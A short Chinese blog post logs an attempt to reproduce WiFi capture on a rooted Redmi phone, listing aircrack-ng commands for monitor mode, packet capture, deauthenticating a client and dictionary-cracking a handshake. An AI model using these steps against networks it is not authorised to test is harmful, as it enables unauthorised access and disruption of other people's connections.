起因
这位大佬的博客讲述了一个使用安卓手机抓取 WIFI 数据包的经历,我想用手里的红米 K30 5G与小米 5复现,于是有了这篇博文
以下内容均在MIUI 12.5,安卓 10 的 红米 K30 5G上完整复现,在此大概做个记录
注意:执行以下操作需要手机获得 root 权限。
正文
<>表示需要根据实际情况更改的内容
pkg install wireless-tools iw tcpdump aircrack-ng ethtool pciutils -y # 有一些是不必要的,可以自行鉴别
# 进入 monitor 模式,抓取数据包并破解
# 此处的命令不一定准确,具体可以`aircrack-ng`为关键词自行搜索教程
tsu
airmon-ng check kill
airmon-ng start wlan0
airodump-ng wlan0
airodump -w <filenamePrefix> -c <channel> --bssid <bssid> wlan0 --ignore-negative-one
aireplay-ng -0 0 -a <bssid> -c <clientMac> --ignore-negative-one # 有发送数据包的输出,但被攻击端并未断开连接
aircrack-ng <filenamePrefix>-<xx>.cap -w <dictionaryPath>
# 退出
airmon-ng stop wlan0